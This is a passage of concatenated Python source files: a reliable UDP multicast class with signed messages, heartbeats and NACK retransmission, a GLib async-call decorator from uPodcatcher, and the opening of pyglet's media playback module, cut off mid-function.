self.heartbeat_thread = None
def _setup_multicast_listener(self):
# create listener socket
self._multicast_listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
# Enable to run multiple clients and servers on a single (host,port)
self._multicast_listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
# Enable broadcasting mode
self._multicast_listener.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
self._multicast_listener.bind(("", self._multicast_port))
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(self._multicast_addr)
mreq = struct.pack("4sL", group, socket.INADDR_ANY)
self._multicast_listener.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def _setup_udp_sock(self):
self._udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._udp_sock.bind(("", 0))
def send(self, message: Message, config=False, sign=True):
if not message.is_decoded:
message.decode()
if not self._suspend_multicast or config:
with self._R_g_lock:
pb_message = PiggybackMessage.initFromMessage(message, self._identifier, self._S_p, self._R_g)
pb_message.encode()
if sign:
pb_message.sign(self._signature)
self._last_msg_sent_ts = time.time_ns() / 10**9
self._udp_sock.sendto(
pb_message.json_data.encode(), (self._multicast_addr, self._multicast_port)
)
response = self._deliver(pb_message.json_data, self._identifier, self._S_p)
self._check_holdback_queue()
self._S_p += 1
if not self._response_channel.is_empty():
response, config = self._response_channel.consume()
response_msg = Message.initFromJSON(response)
self.send(response_msg, config)
else:
if not message.is_encoded:
message.encode()
self._response_channel.produce((message.json_data, False))
def _send_unicast(self, message: Message, addr: tuple[str, int]):
if not message.is_encoded:
message.encode()
self._udp_sock.sendto(message.json_data.encode(), addr)
def _send_nack(self, messages, addr):
nack = NegativeAcknowledgement.initFromData(messages)
nack.encode()
nack.sign(self._signature)
self._send_unicast(nack, addr)
def start(self, listen=True, trash=False):
if trash:
self._response_channel.set_trash_flag(True)
self.terminate = False
if self.listening_thread is None or not self.listening_thread.is_alive():
if listen and not self._open:
self.listening_thread = threading.Thread(target=self._listen)
elif listen and self._open:
self.listening_thread = threading.Thread(target=self._listen_open)
else:
self.listening_thread = threading.Thread(target=self._listen_for_nacks)
self.listening_thread.start()
self.heartbeat_thread = threading.Thread(target=self._heartbeat)
self.heartbeat_thread.start()
def stop(self):
self.terminate = True
if self.heartbeat_thread is not None:
self.heartbeat_thread.join()
self.heartbeat_thread = None
if self.listening_thread is not None:
self.listening_thread.join()
self.listening_thread = None
def disable_responses(self):
self._response_channel.set_trash_flag(True)
def enable_responses(self):
self._response_channel.set_trash_flag(False)
def _heartbeat(self):
interval = self._configuration.get_heartbeat_interval()
while not self.terminate:
time.sleep(interval)
ts = time.time_ns() / 10**9
# if ts - self._last_msg_sent_ts <= 5*interval:
heartbeat = HeartBeat.initFromData(self._R_g)
heartbeat.encode()
if not self._open:
heartbeat.sign(self._signature)
self._udp_sock.sendto(
heartbeat.json_data.encode(),
(self._multicast_addr, self._multicast_port),
)
def _listen(self):
while not self.terminate:
ready_socks, _, _ = select.select([self._udp_sock, self._multicast_listener], [], [])
for sock in ready_socks:
data, addr = sock.recvfrom(1024)
data = data.decode()
msg = Message.initFromJSON(data)
msg.decode()
sender_id, _ = msg.get_signature()
if msg.header == "HeartBeat":
self._receive_heartbeat(data, addr)
else:
if msg.verify_signature(self._signature, self._group_view.pks):
if msg.header == "NACK":
if not self._group_view.check_if_server_is_suspended(sender_id):
self._receive_nack(data, addr)
else:
if sock == self._udp_sock or not self._group_view.check_if_server_is_suspended(
sender_id
):
self._receive_pb_message(data, addr)
def _listen_open(self):
while not self.terminate:
ready_socks, _, _ = select.select([self._udp_sock, self._multicast_listener], [], [])
for sock in ready_socks:
data, addr = sock.recvfrom(1024)
data = data.decode()
msg = Message.initFromJSON(data)
msg.decode()
if msg.header == "HeartBeat":
self._receive_heartbeat(data, addr)
elif msg.header == "NACK":
if msg.verify_signature(self._signature, self._group_view.pks):
sender_id, _ = msg.get_signature()
if not self._group_view.check_if_server_is_inactive(sender_id):
self._receive_nack(data, addr)
else:
msg = PiggybackMessage.initFromJSON(data)
msg.decode()
if msg.seqno == 0 or msg.verify_signature(self._signature, self._group_view.users):
msg.set_sender(addr)
msg.encode()
data = msg.json_data
self._receive_pb_message(data, addr)
def _listen_for_nacks(self):
while not self.terminate:
ready_socks, _, _ = select.select([self._udp_sock], [], [])
for sock in ready_socks:
data, addr = sock.recvfrom(1024)
data = data.decode()
msg = Message.initFromJSON(data)
msg.decode()
if msg.header == "NACK":
self._receive_nack(data, addr)
def _receive_heartbeat(self, data, addr):
heartbeat = HeartBeat.initFromJSON(data)
heartbeat.decode()
self._handle_acks(heartbeat.acks, addr, {})
def _receive_nack(self, data, addr):
nack = NegativeAcknowledgement.initFromJSON(data)
nack.decode()
for identifier in nack.nacks:
if identifier in self._storage:
for seqno in nack.nacks[identifier]:
if seqno >= len(self._storage[identifier]):
break
nack_response = PiggybackMessage.initFromJSON(self._storage[identifier][seqno])
self._send_unicast(nack_response, addr)
def _receive_pb_message(self, data, addr):
pb_message = PiggybackMessage.initFromJSON(data)
pb_message.decode()
if pb_message.identifier == self._identifier:
return
# only accept old messages of suspended servers
if (
self._group_view.check_if_server_is_suspended(pb_message.identifier)
and pb_message.seqno > self._max_R_g[pb_message.identifier]
):
return
nack_messages = {}
check_responses = False
if pb_message.identifier not in self._storage:
self._storage[pb_message.identifier] = []
self._R_g[pb_message.identifier] = -1
self._holdback_queue[pb_message.identifier] = {}
self._requested_messages[pb_message.identifier] = [0, -1]
if pb_message.seqno == self._R_g[pb_message.identifier] + 1:
# message can be delivered instantly
self._deliver(data, pb_message.identifier, pb_message.seqno)
self._check_holdback_queue()
check_responses = True
elif pb_message.seqno > self._R_g[pb_message.identifier] + 1:
# there are missing messages => store message in holdback queue
with self._holdback_queue_lock:
self._holdback_queue[pb_message.identifier][pb_message.seqno] = data
if (
self._requested_messages[pb_message.identifier][0]
+ self._configuration.get_heartbeat_interval()
< time.time_ns() / 10**9
):
self._requested_messages[pb_message.identifier][1] = self._R_g[pb_message.identifier]
# send nacks
missing_messages = list(
set(
range(
self._requested_messages[pb_message.identifier][1] + 1,
pb_message.seqno,
)
)
- set(self._holdback_queue[pb_message.identifier].keys())
)
if len(missing_messages) != 0:
nack_messages[pb_message.identifier] = missing_messages
self._handle_acks(pb_message.acks, addr, nack_messages)
if check_responses:
if not self._response_channel.is_empty():
response, config = self._response_channel.consume()
response_msg = Message.initFromJSON(response)
self.send(response_msg, config)
def _handle_acks(self, acks, addr, nack_messages):
# send nacks if detecting missing messages
for ack in acks:
if ack in self._group_view.servers:
if ack not in self._max_R_g or (acks[ack] > self._max_R_g[ack]):
self._max_R_g[ack] = acks[ack]
if ack != self._identifier:
if ack not in self._storage:
self._storage[ack] = []
self._R_g[ack] = -1
self._holdback_queue[ack] = {}
self._requested_messages[ack] = [0, -1]
if (
self._requested_messages[ack][0] + self._configuration.get_heartbeat_interval()
< time.time_ns() / 10**9
):
self._requested_messages[ack][1] = self._R_g[ack]
missing_messages = list(
set(range(self._requested_messages[ack][1] + 1, acks[ack] + 1))
- set(self._holdback_queue[ack].keys())
)
if len(missing_messages) != 0:
nack_messages[ack] = missing_messages
if len(nack_messages) > 0:
nack_count = sum([len(nack_messages[identifier]) for identifier in nack_messages])
if nack_count > 100:
for identifier in nack_messages:
l = len(nack_messages[identifier])
nack_messages[identifier] = nack_messages[identifier][: int(100 * l / nack_count)]
for identifier in nack_messages:
l = len(nack_messages[identifier])
if l > 0:
self._requested_messages[identifier][0] = time.time_ns() / 10**9
self._requested_messages[identifier][1] = max(
self._requested_messages[identifier][1],
nack_messages[identifier][-1],
)
self._send_nack(nack_messages, addr)
def _deliver(self, data, identifier, seqno):
if self._channel is not None:
self._channel.produce(data)
self._update_storage(data, identifier, seqno)
def _update_storage(self, data, identifier, seqno):
# update storage and acks
self._storage[identifier].append(data)
self._R_g[identifier] = seqno
if identifier != self._identifier:
self._requested_messages[identifier][0] = time.time_ns() / 10**9
self._requested_messages[identifier][1] = max(seqno, self._requested_messages[identifier][1])
def _check_holdback_queue(self):
change = True
while change:
change = False
for identifier in self._holdback_queue:
next_seqno = self._R_g[identifier] + 1
while next_seqno in self._holdback_queue[identifier]:
self._deliver(
self._holdback_queue[identifier][next_seqno],
identifier,
next_seqno,
)
next_seqno += 1
change = True
# remove stale elements of the holdback queue
with self._holdback_queue_lock:
for identifier in self._holdback_queue:
stale_messages = [
stale_seqno
for stale_seqno in self._holdback_queue[identifier]
if stale_seqno <= self._R_g[identifier]
]
for stale_message in stale_messages:
del self._holdback_queue[identifier][stale_message]
def halt_sending(self):
self._suspend_multicast = True
def continue_sending(self):
self._suspend_multicast = False
|
asyncf.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# async.py
#
# This file is part of uPodcatcher
#
# Copyright (C) 2014
# Lorenzo Carbonell Cerezo <lorenzo.carbonell.cerezo@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import gi
try:
gi.require_version('GLib', '2.0')
except Exception as e:
print(e)
exit(1)
from gi.repository import GLib
import threading
import traceback
__all__ = ['async_function']
def _async_call(f, args, kwargs, on_done):
def run(data):
f, args, kwargs, on_done = data
error = None
result = None
try:
result = f(*args, **kwargs)
except Exception as e:
e.traceback = traceback.format_exc()
error = 'Unhandled exception in asyn call:\n{}'.format(e.traceback)
GLib.idle_add(lambda: on_done(result, error))
data = f, args, kwargs, on_done
thread = threading.Thread(target=run, args=(data,))
thread.daemon = True
thread.start()
def async_function(on_done=None):
'''
A decorator that can be used on free functions so they will always be
called asynchronously. The decorated function should not use any resources
shared by the main thread.
Example:
def do_async_stuff(self, input_string):
def on_async_done(result, error):
# Do stuff with the result and handle errors in the main thread.
if error:
print(error)
elif result:
print(result)
@async_function(on_done=on_async_done)
def do_expensive_stuff_in_thread(input_string):
# Pretend to do expensive stuff...
time.sleep(10)
stuff = input_string + ' Done in a different thread'
return stuff
do_expensive_stuff_in_thread(input_string)
'''
def wrapper(f):
def run(*args, **kwargs):
_async_call(f, args, kwargs, on_done)
return run
return wrapper
|
__init__.py
|
# ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
# $Id$
'''Audio and video playback.
pyglet can play WAV files, and if AVbin is installed, many other audio and
video formats.
Playback is handled by the `Player` class, which reads raw data from `Source`
objects and provides methods for pausing, seeking, adjusting the volume, and
so on. The `Player` class implements a the best available audio device
(currently, only OpenAL is supported)::
player = Player()
A `Source` is used to decode arbitrary audio and video files. It is
associated with a single player by "queuing" it::
source = load('background_music.mp3')
player.queue(source)
Use the `Player` to control playback.
If the source contains video, the `Source.video_format` attribute will be
non-None, and the `Player.texture` attribute will contain the current video
image synchronised to the audio.
Decoding sounds can be processor-intensive and may introduce latency,
particularly for short sounds that must be played quickly, such as bullets or
explosions. You can force such sounds to be decoded and retained in memory
rather than streamed from disk by wrapping the source in a `StaticSource`::
bullet_sound = StaticSource(load('bullet.wav'))
The other advantage of a `StaticSource` is that it can be queued on any number
of players, and so played many times simultaneously.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import atexit
import ctypes
import heapq
import sys
import threading
import time
import StringIO
import pyglet
_debug = pyglet.options['debug_media']
_profile = pyglet.options['profile_media']
class MediaException(Exception):
pass
class MediaFormatException(MediaException):
pass
class CannotSeekException(MediaException):
pass
class MediaThread(object):
'''A thread that cleanly exits on interpreter shutdown, and provides
a sleep method that can be interrupted and a termination method.
:Ivariables:
`condition` : threading.Condition
Lock condition on all instance variables.
`stopped` : bool
True if `stop` has been called.
'''
_threads = set()
_threads_lock = threading.Lock()
def __init__(self, target=None):
self._thread = threading.Thread(target=self._thread_run)
self._thread.setDaemon(True)
if target is not None:
self.run = target
self.condition = threading.Condition()
self.stopped = False
@classmethod
def _atexit(cls):
cls._threads_lock.acquire()
threads = list(cls._threads)
cls._threads_lock.release()
for thread in threads:
thread.stop()
def run(self):
pass
def _thread_run(self):
if pyglet.options['debug_trace']:
pyglet._install_trace()
self._threads_lock.acquire()
self._threads.add(self)
self._threads_lock.release()
self.run()
self._threads_lock.acquire()
self._threads.remove(self)
self._threads_lock.release()
def start(self):
self._thread.start()
def stop(self):
'''Stop the thread and wait for it to terminate.
The `stop` instance variable is set to ``True`` and the condition is
notified. It is the responsibility of the `run` method to check
the value of `stop` after each sleep or wait and to return if set.
'''
if _debug:
print 'MediaThread.stop()'
self.condition.acquire()
self.stopped = True
self.condition.notify()
self.condition.release()
self._thread.join()
def sleep(self, timeout):
'''Wait for some amount of time, or until notified.
:Parameters:
`timeout` : float
Time to wait, in seconds.
'''
if _debug:
print 'MediaThread.sleep(%r)' % timeout
self.condition.acquire()
self.condition.wait(timeout)
self.condition.release()
def notify(self):
'''Interrupt the current sleep operation.
If the thread is currently sleeping, it will be woken immediately,
instead of waiting the full duration of the timeout.
'''
if _debug:
print 'MediaThread.notify()'
self.condition.acquire()
self.condition.notify()
self.condition.release()
atexit.register(MediaThread._atexit)
class WorkerThread(MediaThread):
def __init__(self, target=None):
super(WorkerThread, self).__init__(target)
self._jobs = []
def run(self):
while True:
job = self.get_job()
if not job:
break
job()
def get_job(self):
self.condition.acquire()
while self._empty() and not self.stopped:
self.condition.wait()
if self.stopped:
result = None
else:
result = self._get()
self.condition.release()
return result
def put_job(self, job):
self.condition.acquire()
self._put(job)
self.condition.notify()
self.condition.release()
def clear_jobs(self):
self.condition.acquire()
self._clear()
self.condition.notify()
self.condition.release()
def _empty(self):
return not self._jobs
def _get(self):
return self._jobs.pop(0)
def _put(self, job):
self._jobs.append(job)
def _clear(self):
del self._jobs[:]
class AudioFormat(object):
'''Audio details.
An instance of this class is provided by sources with audio tracks. You
should not modify the fields, as they are used internally to describe the
format of data provided by the source.
:Ivariables:
`channels` : int
The number of channels: 1 for mono or 2 for stereo (pyglet does
not yet support surround-sound sources).
`sample_size` : int
Bits per sample; only 8 or 16 are supported.
`sample_rate` : int
Samples per second (in Hertz).
'''
def __init__(self, channels, sample_size, sample_rate):
self.channels = channels
self.sample_size = sample_size
self.sample_rate = sample_rate
# Convenience
self.bytes_per_sample = (sample_size >> 3) * channels
self.bytes_per_second = self.bytes_per_sample * sample_rate
def __eq__(self, other):
return (self.channels == other.channels and
self.sample_size == other.sample_size and
self.sample_rate == other.sample_rate)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return '%s(channels=%d, sample_size=%d, sample_rate=%d)' % (
self.__class__.__name__, self.channels, self.sample_size,
self.sample_rate)
class VideoFormat(object):
'''Video details.
An instance of this class is provided by sources with a video track. You
should not modify the fields.
Note that the sample aspect has no relation to the aspect ratio of the
video image. For example, a video image of 640x480 with sample aspect 2.0
should be displayed at 1280x480. It is the responsibility of the
application to perform this scaling.
:Ivariables:
`width` : int
Width of video image, in pixels.
`height` : int
Height of video image, in pixels.
`sample_aspect` : float
Aspect ratio (width over height) of a single video pixel.
`frame_rate` : float
Frame rate (frames per second) of the video.
AVbin 8 or later is required, otherwise the frame rate will be
``None``.
**Since:** pyglet 1.2.
'''
def __init__(self, width, height, sample_aspect=1.0):
self.width = width
self.height = height
self.sample_aspect = sample_aspect
self.frame_rate = None
class AudioData(object):
'''A single packet of audio data.
This class is used internally by pyglet.
:Ivariables:
`data` : str or ctypes array or pointer
Sample data.
`length` : int
Size of sample data, in bytes.
`timestamp` : float
Time of the first sample, in seconds.
`duration` : float
Total data duration, in seconds.
`events` : list of MediaEvent
List of events contained within this packet. Events are
timestamped relative to this audio packet.
'''
def __init__(self, data, length, timestamp, duration, events):
self.data = data
self.length = length
self.timestamp = timestamp
self.duration = duration
self.events = events
def consume(self, bytes, audio_format):
'''Remove some data from beginning of packet. All events are
cleared.'''
self.events = ()
if bytes == self.length:
self.data = None
self.length = 0
self.timestamp += self.duration
self.duration = 0.
return
elif bytes == 0:
return
if not isinstance(self.data, str):
# XXX Create a string buffer for the whole packet then
# chop it up. Could do some pointer arith here and
# save a bit of data pushing, but my guess is this is
# faster than fudging aruond with ctypes (and easier).
data = ctypes.create_string_buffer(self.length)
ctypes.memmove(data, self.data, self.length)
self.data = data
self.data = self.data[bytes:]
self.length -= bytes
self.duration -= bytes / float(audio_format.bytes_per_second)
self.timestamp += bytes / float(audio_format.bytes_per_second)
def get_string_data(self):
'''Return data as a string.'''
if type(self.data) is str:
return self.data
buf = ctypes.create_string_buffer(self.length)
ctypes.memmove(buf, self.data, self.length)
return buf.raw
class MediaEvent(object):
def __init__(self, timestamp, event, *args):
# Meaning of timestamp is dependent on context; and not seen by
# application.
self.timestamp = timestamp
self.event = event
self.args = args
def _sync_dispatch_to_player(self, player):
pyglet.app.platform_event_loop.post_event(player, self.event, *self.args)
time.sleep(0)
# TODO sync with media.dispatch_events
def __repr__(self):
return '%s(%r, %r, %r)' % (self.__class__.__name__,
self.timestamp, self.event, self.args)
class SourceInfo(object):
'''Source metadata information.
Fields are the empty string or zero if the information is not available.
:Ivariables:
`title` : str
Title
`author` : str
Author
`copyright` : str
Copyright statement
`comment` : str
Comment
`album` : str
Album name
`year` : int
Year
`track` : int
Track number
`genre` : str
Genre
:since: pyglet 1.2
'''
title = ''
author = ''
copyright = ''
comment = ''
album = ''
year = 0
track = 0
genre = ''
class Source(object):
'''An audio and/or video source.
:Ivariables:
`audio_format` : `AudioFormat`
Format of the audio in this source, or None if the source is
silent.
`video_format` : `VideoFormat`
Format of the video in this source, or None if there is no
video.
`info` : `SourceInfo`
Source metadata such as title, artist, etc; or None if the
information is not available.
**Since:** pyglet 1.2
'''
_duration = None
audio_format = None
video_format = None
info = None
def _get_duration(self):
return self._duration
duration = property(lambda self: self._get_duration(),
doc='''The length of the source, in seconds.
Not all source durations can be determined; in this case the value
is None.
Read-only.
:type: float
''')
def play(self):
'''Play the source.
This is a convenience method which creates a ManagedSoundPlayer for
this source and plays it immediately.
:rtype: `ManagedSoundPlayer`
'''
player = ManagedSoundPlayer()
player.queue(self)
player.play()
return player
def get_animation(self):
'''Import all video frames into memory as an `Animation`.
An empty animation will be returned if the source has no video.
Otherwise, the animation will contain all unplayed video frames (the
entire source, if it has not been queued on a player). After creating
the animation, the source will be at EOS.
This method is unsuitable for videos running longer than a
few seconds.
:since: pyglet 1.1
:rtype: `pyglet.image.Animation`
'''
from pyglet.image import Animation, AnimationFrame
if not self.video_format:
return Animation([])
else:
frames = []
last_ts = 0
next_ts = self.get_next_video_timestamp()
while next_ts is not None:
image = self.get_next_video_frame()
if image is not None:
delay = next_ts - last_ts
frames.append(AnimationFrame(image, delay))
last_ts = next_ts
next_ts = self.get_next_video_timestamp()
return Animation(frames)
def get_next_video_timestamp(self):
'''Get the timestamp of the next video frame.
:since: pyglet 1.1
:rtype: float
:return: The next timestamp, or ``None`` if there are no more video
frames.
'''
pass
def get_next_video_frame(self):
'''Get the next video frame.
Video frames may share memory: the previous frame may be invalidated
or corrupted when this method is called unless the application has
made a copy of it.
:since: pyglet 1.1
:rtype: `pyglet.image.AbstractImage`
:return: The next video frame image, or ``None`` if the video frame
could not be decoded or there are no more video frames.
'''
pass
# Internal methods that SourceGroup calls on the source:
def seek(self, timestamp):
'''Seek to given timestamp.'''
raise CannotSeekException()
def _get_queue_source(self):
'''Return the `Source` to be used as the queue source for a player.
Default implementation returns self.'''
return self
def get_audio_data(self, bytes):
'''Get next packet of audio data.
:Parameters:
`bytes` : int
Maximum number of bytes of data to return.
:rtype: `AudioData`
:return: Next packet of audio data, or None if there is no (more)
data.
'''
return None
class StreamingSource(Source):
'''A source that is decoded as it is being played, and can only be
queued once.
'''
_is_queued = False
is_queued = property(lambda self: self._is_queued,
doc='''Determine if this source has been queued
on a `Player` yet.
Read-only.
:type: bool
''')
def _get_queue_source(self):
'''Return the `Source` to be used as the queue source for a player.
Default implementation returns self.'''
if self._is_queued:
raise MediaException('This source is already queued on a player.')
self._is_queued = True
return self
class StaticSource(Source):
'''A source that has been completely decoded in memory. This source can
be queued onto multiple players any number of times.
'''
def __init__(self, source):
'''Construct a `StaticSource` for the data in `source`.
:Parameters:
`source` : `Source`
The source to read and decode audio and video data from.
'''
source = source._get_queue_source()
if source.video_format:
raise NotImplementedError(
'Static sources not supported for video yet.')
self.audio_format = source.audio_format
if not self.audio_format:
return
# Arbitrary: number of bytes to request at a time.
buffer_size = 1 << 20 # 1 MB
# Naive implementation. Driver-specific implementations may override
# to load static audio data into device (or at least driver) memory.
data = StringIO.StringIO()
while True:
audio_data = source.get_audio_data(buffer_size)
if not audio_data:
break
data.write(audio_data.get_string_data())
self._data = data.getvalue()
self._duration = len(self._data) / \
float(self.audio_format.bytes_per_second)
def _get_queue_source(self):
return StaticMemorySource(self._data, self.audio_format)
def get_audio_data(self, bytes):
raise RuntimeError('StaticSource cannot be queued.')
class StaticMemorySource(StaticSource):
'''Helper class for default implementation of `StaticSource`. Do not use
directly.'''
def __init__(self, data, audio_format):
'''Construct a memory source over the given data buffer.
'''
self._file = StringIO.StringIO(data)
self._max_offset = len(data)
self.audio_format = audio_format
self._duration = len(data) / float(audio_format.bytes_per_second)
def seek(self, timestamp):
offset = int(timestamp * self.audio_format.bytes_per_second)
# Align to sample
if self.audio_format.bytes_per_sample == 2:
offset &= 0xfffffffe
elif self.audio_format.bytes_per_sample == 4:
offset &= 0xfffffffc
self._file.seek(offset)
def get_audio_data(self, bytes):
offset = self._file.tell()
timestamp = float(offset) / self.audio_format.bytes_per_second
# Align to sample size
if self.audio_format.bytes_per_sample == 2:
bytes &= 0xfffffffe
elif self.audio_format.bytes_per_sample == 4:
bytes &= 0xfffffffc
data = self._file.read(bytes)
if not len(data):
return None
duration = float(len(data)) / self.audio_format.bytes_per_second
return AudioData(data, len(data), timestamp, duration, [])
class SourceGroup(object):
'''Read data from a queue of sources, with support for looping. All
sources must share the same audio format.
:Ivariables:
`audio_format` : `AudioFormat`
Required audio format for queued sources.
'''
# TODO can sources list go empty? what behaviour (ignore or error)?
_advance_after_eos = False
_loop = False
def __init__(self, audio_format, video_format):
self.audio_format = audio_format
self.video_format = video_format
self.duration = 0.
self._timestamp_offset = 0.
self._dequeued_durations = []
self._sources = []
def seek(self, time):
if self._sources:
self._sources[0].seek(time)
def queue(self, source):
source = source._get_queue_source()
assert(source.audio_format == self.audio_format)
self._sources.append(source)
self.duration += source.duration
def has_next(self):
return len(self._sources) > 1
def next(self, immediate=True):
if immediate:
self._advance()
else:
self._advance_after_eos = True
def get_current_source(self):
if self._sources:
return self._sources[0]
def _advance(self):
if self._sources:
self._timestamp_offset += self._sources[0].duration
self._dequeued_durations.insert(0, self._sources[0].duration)
old_source = self._sources.pop(0)
self.duration -= old_source.duration
def _get_loop(self):
return self._loop
def _set_loop(self, loop):
self._loop = loop
loop = property(_get_loop, _set_loop,
doc='''Loop the current source indefinitely or until
`next` is called. Initially False.
:type: bool
''')
def get_audio_data(self, bytes):
'''Get next audio packet.
:Parameters:
`bytes` : int
Hint for preferred size of audio packet; may be ignored.
:rtype: `AudioData`
:return: Audio data, or None if there is no more data.
'''
data = self._sources[0].get_audio_data(bytes)
eos = False
while not data:
eos = True
if self._loop and not self._advance_after_eos:
self._timestamp_offset += self._sources[0].duration
self._dequeued_durations.insert(0, self._sources[0].duration)
self._sources[0].seek(0)
else:
self._advance_after_eos = False
# Advance source if there's something to advance to.
# Otherwise leave last source paused at EOS.
if len(self._sources) > 1:
self._advance()
else:
return None
data = self._sources[0].get_audio_data(bytes) # TODO method rename
data.timestamp += self._timestamp_offset
if eos:
if _debug:
print 'adding on_eos event to audio data'
data.events.append(MediaEvent(0, 'on_eos'))
return data
def translate_timestamp(self, timestamp):
'''Get source-relative timestamp for the audio player's timestamp.'''
# XXX
if timestamp is None:
return None
timestamp = timestamp - self._timestamp_offset
if timestamp < 0:
for duration in self._dequeued_durations[::-1]:
timestamp += duration
if timestamp > 0:
break
assert timestamp >= 0, 'Timestamp beyond dequeued source memory'
return timestamp
def get_next_video_timestamp(self):
'''Get the timestamp of the next video frame.
:rtype: float
:return: The next timestamp, or ``None`` if there are no more video
frames.
'''
# TODO track current video source independently from audio source for
# better prebuffering.
timestamp = self._sources[0].get_next_video_timestamp()
if timestamp is not None:
timestamp += self._timestamp_offset
return timestamp
def get_next_video_frame(self):
'''Get the next video frame.
Video frames may share memory: the previous frame may be invalidated
or corrupted when this method is called unless the application has
made a copy of it.
:rtype: `pyglet.image.AbstractImage`
:return: The next video frame image, or ``None`` if the video frame
could not be decoded or there are no more video frames.
'''
return self._sources[0].get_next_video_frame()
class AbstractAudioPlayer(object):
'''Base class for driver audio players.
'''
def __init__(self, source_group, player):
'''Create a new audio player.
:Parameters:
`source_group` : `SourceGroup`
Source group to play from.
`player` : `Player`
Player to receive EOS and video frame sync events.
'''
self.source_group = source_group
self.player = player
def play(self):
'''Begin playback.'''
raise NotImplementedError('abstract')
def stop(self):
'''Stop (pause) playback.'''
raise NotImplementedError('abstract')
def delete(self):
'''Stop playing and clean up all resources used by player.'''
raise NotImplementedError('abstract')
def _play_group(self, audio_players):
'''Begin simultaneous playback on a list of audio players.'''
# This should be overridden by subclasses for better synchrony.
for player in audio_players:
player.play()
def _stop_group(self, audio_players):
'''Stop simultaneous playback on a list of audio players.'''
# This should be overridden by subclasses for better synchrony.
for player in audio_players:
player.play()
def clear(self):
'''Clear all buffered data and prepare for replacement data.
The player should be stopped before calling this method.
'''
raise NotImplementedError('abstract')
def get_time(self):
'''Return approximation of current playback time within current source.
Returns ``None`` if the audio player does not know what the playback
time is (for example, before any valid audio data has been read).
:rtype: float
:return: current play cursor time, in seconds.
'''
# TODO determine which source within group
raise NotImplementedError('abstract')
def set_volume(self, volume):
'''See `Player.volume`.'''
pass
def set_position(self, position):
'''See `Player.position`.'''
pass
def set_min_distance(self, min_distance):
'''See `Player.min_distance`.'''
pass
def set_max_distance(self, max_distance):
'''See `Player.max_distance`.'''
pass
def set_pitch(self, pitch):
'''See `Player.pitch`.'''
pass
def set_cone_orientation(self, cone_orientation):
'''See `Player.cone_orientation`.'''
pass
def set_cone_inner_angle(self, cone_inner_angle):
'''See `Player.cone_inner_angle`.'''
pass
def set_cone_outer_angle(self, cone_outer_angle):
'''See `Player.cone_outer_angle`.'''
pass
def set_cone_outer_gain(self, cone_outer_gain):
'''See `Player.cone_outer_gain`.'''
pass
class Player(pyglet.event.EventDispatcher):
'''High-level sound and video player.
'''
_last_video_timestamp = None
_texture = None
# Spacialisation attributes, preserved between audio players
_volume = 1.0
_min_distance = 1.0
_max_distance = 100000000.
_position = (0, 0, 0)
_pitch = 1.0
_cone_orientation = (0, 0, 1)
_cone_inner_angle = 360.
_cone_outer_angle = 360.
_cone_outer_gain = 1.
#: The player will pause when it reaches the end of the stream.
#:
#: :deprecated: Use `SourceGroup.advance_after_eos`
EOS_PAUSE = 'pause'
#: The player will loop the current stream continuosly.
#:
#: :deprecated: Use `SourceGroup.loop`
EOS_LOOP = 'loop'
#: The player will move on to the next queued stream when it reaches the
#: end of the current source. If there is no source queued, the player
#: will pause.
#:
#: :deprecated: Use `SourceGroup.advance_after_eos`
EOS_NEXT = 'next'
#: The player will stop entirely; valid only for ManagedSoundPlayer.
#:
#: :deprecated: Use `SourceGroup.advance_after_eos`
EOS_STOP = 'stop'
#: :deprecated:
_eos_action = EOS_NEXT
def __init__(self):
# List of queued source groups
self._groups = []
self._audio_player = None
# Desired play state (not an indication of actual state).
self._playing = False
self._paused_time = 0.0
def queue(self, source):
if (self._groups and
source.audio_format == self._groups[-1].audio_format and
source.video_format == self._groups[-1].video_format):
self._groups[-1].queue(source)
else:
group = SourceGroup(source.audio_format, source.video_format)
group.queue(source)
self._groups.append(group)
self._set_eos_action(self._eos_action)
self._set_playing(self._playing)
def _set_playing(self, playing):
#stopping = self._playing and not playing
#starting = not self._playing and playing
